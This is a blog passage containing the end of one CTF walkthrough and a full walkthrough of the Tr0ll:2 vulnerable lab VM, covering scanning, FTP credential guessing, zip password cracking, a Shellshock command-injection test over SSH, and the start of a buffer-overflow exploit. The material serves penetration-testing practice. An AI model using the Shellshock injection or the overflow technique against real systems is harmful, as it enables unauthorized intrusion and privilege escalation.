<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-dmQ87ZYie4zFaV8Kgby41ccD_UtkejzXUhQm9kOYtTWJk9_DA1hz1PjgWPEfnay16etctTRS-erxXM7GNhKIERKATJuh3HHcCJ8g8gdja4Y0-bSiy3uSiPJMXlqivfrw9D7l3P2vwx4/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-dmQ87ZYie4zFaV8Kgby41ccD_UtkejzXUhQm9kOYtTWJk9_DA1hz1PjgWPEfnay16etctTRS-erxXM7GNhKIERKATJuh3HHcCJ8g8gdja4Y0-bSiy3uSiPJMXlqivfrw9D7l3P2vwx4/s1600/shell.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! So, let's execute it<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnAOwxkKEb_3e1nIuEN0jlwNBs-vLFiLsLpTYhErs8v89f4ah6LNYU7CjqjbobLS2m_MX3pNE8xUJM5JgFfvqAqAk2HRJsjGSX50vOuPfBTmaHBmvvh3vndRPw1P6-kinQfwY21DDe8mw/s1600/id.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnAOwxkKEb_3e1nIuEN0jlwNBs-vLFiLsLpTYhErs8v89f4ah6LNYU7CjqjbobLS2m_MX3pNE8xUJM5JgFfvqAqAk2HRJsjGSX50vOuPfBTmaHBmvvh3vndRPw1P6-kinQfwY21DDe8mw/s1600/id.png" /></a></div>
<br />
<br />
<br />
<br />
Awesome, we have got limited shell via Web Browser. But we can also obtain console limited shell using certain script.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJdAF41uBIY-U0JCoDmVGho2nqNmVmsDVXoFzfnxOfu_-3shoYGhjVx8c2BeO2ekcpoOSfouNBGo5XZGy2cljvpDhNUkdkAXkrGUT6ols_t8B7vH_H5mK48OJaDjay3UJMPEqc_tLu8co/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJdAF41uBIY-U0JCoDmVGho2nqNmVmsDVXoFzfnxOfu_-3shoYGhjVx8c2BeO2ekcpoOSfouNBGo5XZGy2cljvpDhNUkdkAXkrGUT6ols_t8B7vH_H5mK48OJaDjay3UJMPEqc_tLu8co/s1600/shell.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! So, maybe we can log in as some user using known password. BINGO! We have achieved it! So let's try find something useful<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBxIDJ4kDN9EOzC9q62LgMg87Y6SpUUVMGJdirgUpL9S9VLaWCk7l7ffS5BaBnO6IwDgcXgEf3hLZ7qeQdqrUpd4TLWW0AMOt8Djib-sIyKAl_a-LHrOY8JTHivU09NV8dD31gcCf4T1w/s1600/pk.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBxIDJ4kDN9EOzC9q62LgMg87Y6SpUUVMGJdirgUpL9S9VLaWCk7l7ffS5BaBnO6IwDgcXgEf3hLZ7qeQdqrUpd4TLWW0AMOt8Djib-sIyKAl_a-LHrOY8JTHivU09NV8dD31gcCf4T1w/s1600/pk.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Yeah! Let's download the key for our attacker machine and try log in SSH via key authorization.<br />
Unfortunately without success... Hmmm I am a little bit confused.<br />
So let's look at <b>/home</b> directory<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLepgrYEuOYD4EF3VZ8gT0-Q8zKteMAor1BlekO8qoarFVDA5FlLgUBEAPEJK2049rMWI6RA1DYbi3gIEwVDlEBkNVoMvNchZ1Q-b-qEWFlyqq0yRlXQee8R4sbryWREXGBYq0hgHN4qM/s1600/ftp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLepgrYEuOYD4EF3VZ8gT0-Q8zKteMAor1BlekO8qoarFVDA5FlLgUBEAPEJK2049rMWI6RA1DYbi3gIEwVDlEBkNVoMvNchZ1Q-b-qEWFlyqq0yRlXQee8R4sbryWREXGBYq0hgHN4qM/s1600/ftp.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I was trying decrypt the file but we need to know password. I have found <b>/opt/backup.sh</b> file - it may be interesting!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg89xYDJ2hsp5wK5UVO2irFoxKfBZ-hzmkRUQ-Sr9Hr_jH1OSK1KAo_dAKVEiPMaA0UeWG4I1CRQ-g2nQkC6PM1soH8SAYGZY8DsQaoUd7R1e-s4mjs3rxeAmo3lfcUJ7KHyCAGwjCtF1A/s1600/back.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg89xYDJ2hsp5wK5UVO2irFoxKfBZ-hzmkRUQ-Sr9Hr_jH1OSK1KAo_dAKVEiPMaA0UeWG4I1CRQ-g2nQkC6PM1soH8SAYGZY8DsQaoUd7R1e-s4mjs3rxeAmo3lfcUJ7KHyCAGwjCtF1A/s640/back.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We cannot execute it, but we can see that there is a password for our encrypted file!<br />
<br />
TBU<br />
<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-64089204428713537692016-07-12T13:27:00.000+02:002016-07-22T21:01:23.276+02:00Tr0ll:2Hello,<br />
The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :) Difficulty is beginner++ to intermediate.<br />
<br />
Scanning<br />
<blockquote class="tr_bq">
PORT STATE SERVICE VERSION<br />
21/tcp open ftp vsftpd 2.0.8 or later<br />
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)<br />
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))</blockquote>
Let's begin from FTP service<br />
<blockquote class="tr_bq">
Connected to 192.168.56.101.<br />
220 Welcome to Tr0ll FTP... Only noobs stay for a while...<br />
Name (192.168.56.101:root): anonymous<br />
331 Please specify the password.<br />
Password:<br />
530 Login incorrect.<br />
Login failed.</blockquote>
Uu, we cannot log in as anonymous user.<br />
Let's browse the web application<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvXBwo58gtF-8YVjyl9VI51lkcELZETzwkKPT3m1ENu2VUgHT64m6UY34cyUTqn3odEZQ7S2kr5SFB523t8FBbBTfjFk4jxj3JzqHPIyEWfS6fiPbD9jigFNhyphenhyphenzvFSlh5SViDLYjoxRno/s1600/tr0l.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="397" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvXBwo58gtF-8YVjyl9VI51lkcELZETzwkKPT3m1ENu2VUgHT64m6UY34cyUTqn3odEZQ7S2kr5SFB523t8FBbBTfjFk4jxj3JzqHPIyEWfS6fiPbD9jigFNhyphenhyphenzvFSlh5SViDLYjoxRno/s400/tr0l.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
They bother me :-) I opened <b>robots.txt</b> file and there are several paths.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVFqkcCSDl3E5Il1k7mYjjjZ420rC8q-dI9aUowctI6LigtQ_M4JuQ0j6NmdDJJzDNP7XEliodBATC_DueghhDDCQzrpjS1uYGt7RMQz3IlegZEVHu6Pj44o-SoGk31Hw5SUyBICwhzvA/s1600/robot.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVFqkcCSDl3E5Il1k7mYjjjZ420rC8q-dI9aUowctI6LigtQ_M4JuQ0j6NmdDJJzDNP7XEliodBATC_DueghhDDCQzrpjS1uYGt7RMQz3IlegZEVHu6Pj44o-SoGk31Hw5SUyBICwhzvA/s400/robot.png" width="247" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nice, isn't it? I add these paths to wordlist and run Dirbuster. We have got following result<br />
<blockquote class="tr_bq">
Dir found: /noob/ - 200<br />
Dir found: /keep_trying/ - 200<br />
Dir found: /ok_this_is_it/ - 200<br />
Dir found: /dont_bother/ - 200</blockquote>
OK, so only four paths are not a fake. So let's examine it. Hmm on each path I have got response<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4fQpagj6sAFfVTtC04PZYTc2-kpu6S34QGj7qn_iQAdE7oWfCSy1VFi4Y6QC9mM7qJBtwQR315Y8iLj1VmTF138TBqgxjeAol5JXXRZDmfHjTUmalaB_R__Cm9yeKPd0nOkrmbwUgGwc/s1600/cat.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4fQpagj6sAFfVTtC04PZYTc2-kpu6S34QGj7qn_iQAdE7oWfCSy1VFi4Y6QC9mM7qJBtwQR315Y8iLj1VmTF138TBqgxjeAol5JXXRZDmfHjTUmalaB_R__Cm9yeKPd0nOkrmbwUgGwc/s640/cat.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, the picture must contain something hidden - I am pretty sure.<br />
Picture from <b>/dont_bother/</b> has injected commet<br />
<blockquote class="tr_bq">
Look Deep within y0ur_self for the answer</blockquote>
Hmm, ok I browsed <b>/y0ur_self/</b> directory<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRcVM4x_P72kYLcVh5LsWa81NNlAW3V_VP5N2SMB5lYiUQMDdhagvxUZhY0dmDd5frLtnQdGqhmhIX3aq-hIA5CaplrTbE_mGnl7JhAO8Vz_7_jhLCpoFcNuL2Zf_-8929jwTzmrzD59k/s1600/ans.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRcVM4x_P72kYLcVh5LsWa81NNlAW3V_VP5N2SMB5lYiUQMDdhagvxUZhY0dmDd5frLtnQdGqhmhIX3aq-hIA5CaplrTbE_mGnl7JhAO8Vz_7_jhLCpoFcNuL2Zf_-8929jwTzmrzD59k/s400/ans.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I have downloaded <b>answer.txt</b> file and there are a lot of base64 encoded line.<br />
I conducted brute-force FTP credentials using decoded answer.txt file, without success. So, I was wondering how may look like credentials and I thought about root:root, so maybe Tr0ll:Tr0ll?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9ZHVcu2dYa8CkhTxfOTnqbrRHODR8nfOgO83IfAnymnlll_GT78ZkOStVG5AhSqnLWDmg60YBeHUVQw4pCtfZHrlMsuvPgM38KZUCycEfFghLEMKvkjQmdNhzDChXDij8WivfC1-H0Xo/s1600/ftp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9ZHVcu2dYa8CkhTxfOTnqbrRHODR8nfOgO83IfAnymnlll_GT78ZkOStVG5AhSqnLWDmg60YBeHUVQw4pCtfZHrlMsuvPgM38KZUCycEfFghLEMKvkjQmdNhzDChXDij8WivfC1-H0Xo/s1600/ftp.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! Let's download <b>lmao.zip</b> file and unpack it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEintQRppnht4vSxAXxiNFSI6CMsI4OXE7VSoAdVD2LtdDBocsb7P3upHLem5VJ_4Uqaac4RUw8H3TsQg94CoIjfQ0ML3kB9g8TcGA7RD5shzR6K_MX48CdHZFDOZChhgMc6XaAG7WUbJVs/s1600/lmao.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEintQRppnht4vSxAXxiNFSI6CMsI4OXE7VSoAdVD2LtdDBocsb7P3upHLem5VJ_4Uqaac4RUw8H3TsQg94CoIjfQ0ML3kB9g8TcGA7RD5shzR6K_MX48CdHZFDOZChhgMc6XaAG7WUbJVs/s1600/lmao.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Ups, we need to have password... Maybe answer.txt would be useful in this case?<br />
<blockquote class="tr_bq">
PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL</blockquote>
Awesome! I have unpacked lmao.zip file using appropriate password<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUBkAY1O6uLQYypC_vxRn7lZW0PSY6f7QkdoB4kPsxNt98OzXHddeF9eddLP9kk1wnSqvMhUFfTFbQH0FYIEzlfAxjunhRyR1jotW1UD-fa14Mo7PYGdHJMXuGak9xTNj3w2AP3VIu18U/s1600/noob.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUBkAY1O6uLQYypC_vxRn7lZW0PSY6f7QkdoB4kPsxNt98OzXHddeF9eddLP9kk1wnSqvMhUFfTFbQH0FYIEzlfAxjunhRyR1jotW1UD-fa14Mo7PYGdHJMXuGak9xTNj3w2AP3VIu18U/s1600/noob.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We have got private key for SSH! Let's try login using the key.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXXVhxYsxXvNu_Ng0glyyOU3QYjJyu1NTNIgSfYMgWYpHxxc3eao6qfLbUgrtw5rUsyfhn_b_QkNoS-gcqRugYwUuTcaSu5W5LLqHFaRlLhMq4AF4Xl36VvlLwTrGoy8LXQYMsxNGGLhY/s1600/Screenshot+from+2016-07-12+07-09-02.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXXVhxYsxXvNu_Ng0glyyOU3QYjJyu1NTNIgSfYMgWYpHxxc3eao6qfLbUgrtw5rUsyfhn_b_QkNoS-gcqRugYwUuTcaSu5W5LLqHFaRlLhMq4AF4Xl36VvlLwTrGoy8LXQYMsxNGGLhY/s1600/Screenshot+from+2016-07-12+07-09-02.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="tr_bq">
I don't know what is going on. Let's use verbose modeOpenSSH_7.2p2 Debian-5, OpenSSL 1.0.2h 3 May 2016<br />
debug1: Reading configuration data /etc/ssh/ssh_config<br />
debug1: /etc/ssh/ssh_config line 19: Applying options for *<br />
debug1: Connecting to 192.168.56.101 [192.168.56.101] port 22.<br />
debug1: Connection established.<br />
debug1: permanently_set_uid: 0/0<br />
debug1: key_load_public: No such file or directory<br />
debug1: identity file noob type -1<br />
debug1: key_load_public: No such file or directory<br />
debug1: identity file noob-cert type -1<br />
debug1: Enabling compatibility mode for protocol 2.0<br />
debug1: Local version string SSH-2.0-OpenSSH_7.2p2 Debian-5<br />
debug1: Remote protocol version 2.0, remote software version OpenSSH_5.9p1 Debian-5ubuntu1.4<br />
debug1: match: OpenSSH_5.9p1 Debian-5ubuntu1.4 pat OpenSSH_5* compat 0x0c000000<br />
debug1: Authenticating to 192.168.56.101:22 as 'noob'<br />
debug1: SSH2_MSG_KEXINIT sent<br />
debug1: SSH2_MSG_KEXINIT received<br />
debug1: kex: algorithm: ecdh-sha2-nistp256<br />
debug1: kex: host key algorithm: ecdsa-sha2-nistp256<br />
debug1: kex: server->client cipher: aes128-ctr MAC: umac-64@openssh.com compression: none<br />
debug1: kex: client->server cipher: aes128-ctr MAC: umac-64@openssh.com compression: none<br />
debug1: sending SSH2_MSG_KEX_ECDH_INIT<br />
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY<br />
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:I3xuSgcBlIsoldKTkOyVYwx8B4NLGl0fDDTi0H6ExYg<br />
debug1: Host '192.168.56.101' is known and matches the ECDSA host key.<br />
debug1: Found key in /root/.ssh/known_hosts:4<br />
debug1: rekey after 4294967296 blocks<br />
debug1: SSH2_MSG_NEWKEYS sent<br />
debug1: expecting SSH2_MSG_NEWKEYS<br />
debug1: rekey after 4294967296 blocks<br />
debug1: SSH2_MSG_NEWKEYS received<br />
debug1: SSH2_MSG_SERVICE_ACCEPT received<br />
debug1: Authentications that can continue: publickey,password<br />
debug1: Next authentication method: publickey<br />
debug1: Trying private key: noob<br />
debug1: Authentication succeeded (publickey).<br />
Authenticated to 192.168.56.101 ([192.168.56.101]:22).<br />
debug1: channel 0: new [client-session]<br />
debug1: Requesting no-more-sessions@openssh.com<br />
debug1: Entering interactive session.<br />
debug1: pledge: network<br />
debug1: Remote: Forced command.<br />
debug1: Sending environment.<br />
debug1: Sending env LANG = en_US.UTF-8<br />
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0<br />
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0<br />
TRY HARDER LOL!<br />
debug1: channel 0: free: client-session, nchannels 1<br />
Connection to 192.168.56.101 closed.<br />
Transferred: sent 2696, received 1712 bytes, in 0.0 seconds<br />
Bytes per second: sent 54430.6, received 34564.2<br />
debug1: Exit status 0</blockquote>
We have to google what is that. I found that this may be Shellshock vulnerability.<br />
So, letry verfity our prediction<br />
<blockquote class="tr_bq">
root@kali:~# ssh -l noob -i noob 192.168.56.101 '() { :;}; echo MALICIOUS CODE'<br />
MALICIOUS CODE<br />
TRY HARDER LOL!</blockquote>
Yes, there is Shellshock, so we are able to exploit it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibA9rIPbkxsSWoQWqSRcj-IiA2XM9CcNQun5xkkdTp5dvf17RA3qrt4w-ZfYw_XhVPFlQ07BTL9ZBwpk8kgh0rc9SrP8OeCl5Z3CbxkAPtMtl0glOOkslDIssn9qQfYr1R3YOv5r5MWI0/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibA9rIPbkxsSWoQWqSRcj-IiA2XM9CcNQun5xkkdTp5dvf17RA3qrt4w-ZfYw_XhVPFlQ07BTL9ZBwpk8kgh0rc9SrP8OeCl5Z3CbxkAPtMtl0glOOkslDIssn9qQfYr1R3YOv5r5MWI0/s1600/shell.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! We have got limited shell. I went to the <b>/home/noob/</b> directory and found<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsLQWHrpST88Xi7-t9kApxe0JhWaNLz1F444dWyvD0ig9d-uDnLxUf7AM7nbAuvJwgXyWAOZsmVddHMCcd9rEfK510XabeO_tjJ__vqfxVxi5tWnGE5WoSl3S8RtTitVU8tpNAPcu0-Gc/s1600/poc.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsLQWHrpST88Xi7-t9kApxe0JhWaNLz1F444dWyvD0ig9d-uDnLxUf7AM7nbAuvJwgXyWAOZsmVddHMCcd9rEfK510XabeO_tjJ__vqfxVxi5tWnGE5WoSl3S8RtTitVU8tpNAPcu0-Gc/s1600/poc.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So, we need to find <b>bof</b> file and use Buffer Overflow to get root and it would be over.<br />
<br />
I found interesting file<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkG6l3-6jIP124IOtaqsc8MMiHqu2_FkjZeciVkuUErpwV9g7pspGDcaZJV5QBQS1cMgUVxdXXfqSkl51a3WJonR6KzUor5wh_xi5RnOimQ2xvdYtvH0qGUZ2RRRAzL04QEjGDG1h_L8/s1600/noobek.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkG6l3-6jIP124IOtaqsc8MMiHqu2_FkjZeciVkuUErpwV9g7pspGDcaZJV5QBQS1cMgUVxdXXfqSkl51a3WJonR6KzUor5wh_xi5RnOimQ2xvdYtvH0qGUZ2RRRAzL04QEjGDG1h_L8/s640/noobek.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
let's try perform Buffer Overflow.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVXCTbSZTRLGpBxHVzLQfvuUsSS2eIe0xoX82Yn80ZNHvDmJ0Shb5pT_aQ8Q160U5tQngU2_OMH12P7jaL_L65cN0ex7YQONjeWe_OsCriEaljXI5F5cswbAAygBFrbXPF5sv_Aozjwdk/s1600/blekurwa.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVXCTbSZTRLGpBxHVzLQfvuUsSS2eIe0xoX82Yn80ZNHvDmJ0Shb5pT_aQ8Q160U5tQngU2_OMH12P7jaL_L65cN0ex7YQONjeWe_OsCriEaljXI5F5cswbAAygBFrbXPF5sv_Aozjwdk/s1600/blekurwa.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now, we are sure that we have to prepare Buffer Overflow payload. To perform this kind of attack we have to know where is located EIP register.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlU95hY_wWSy8kXkhwKzqmK7NiR_fAZkUF1ITjmOIsRT7oObI_4RGBbDZbkEo2sH4-RDLhy22BcC43pUnlPCdBu5VdeZmgohDZIRnHJb9tAQofNR1F7l0MrewLtSNGN_QZT6Yt0JAwRsg/s1600/bof.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlU95hY_wWSy8kXkhwKzqmK7NiR_fAZkUF1ITjmOIsRT7oObI_4RGBbDZbkEo2sH4-RDLhy22BcC43pUnlPCdBu5VdeZmgohDZIRnHJb9tAQofNR1F7l0MrewLtSNGN_QZT6Yt0JAwRsg/s1600/bof.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So, we know that our payload should be - [payload length 268] + [EIP] + [Trash]<br />
I examined this application and I couldn't find <b>JMP ESP</b> but we can use <b>CALL EAX</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPWflFy1etMtFxxMJjfNRbOesDBRTd7svvPLnsEk0zdOKK9EUQu5Qzd2rL9Gz1NjdGbx9YoVwYKq0_catiNFVIKUDa4qH9CM0km77AmXuFU0qUngwhgWNwf5ou5xLpemMXnIieUIuJKz0/s1600/call.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPWflFy1etMtFxxMJjfNRbOesDBRTd7svvPLnsEk0zdOKK9EUQu5Qzd2rL9Gz1NjdGbx9YoVwYKq0_catiNFVIKUDa4qH9CM0km77AmXuFU0qUngwhgWNwf5ou5xLpemMXnIieUIuJKz0/s1600/call.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, but unfortunately it is not work :( Maybe I am wrong, let's try again find jmp esp.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEqSsrtHtfZpugshjuQWL5ufok5iiHRvKLaj8kI0bcWrBCK1zEH6r3PMFLAsxaWSLHoICBcL16yrNNcZExKq9DZhRKp4i0Ze4LdSWdB8FnVl6h45RkG7YjO-3xZK7SgtvLncGrTpBd_Mw/s1600/esp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEqSsrtHtfZpugshjuQWL5ufok5iiHRvKLaj8kI0bcWrBCK1zEH6r3PMFLAsxaWSLHoICBcL16yrNNcZExKq9DZhRKp4i0Ze4LdSWdB8FnVl6h45RkG7YjO-3xZK7SgtvLncGrTpBd_Mw/s1600/esp.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Wow, there is a ESP register, so let's generate appropriate shellcode and execute it locally.<br />
<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.com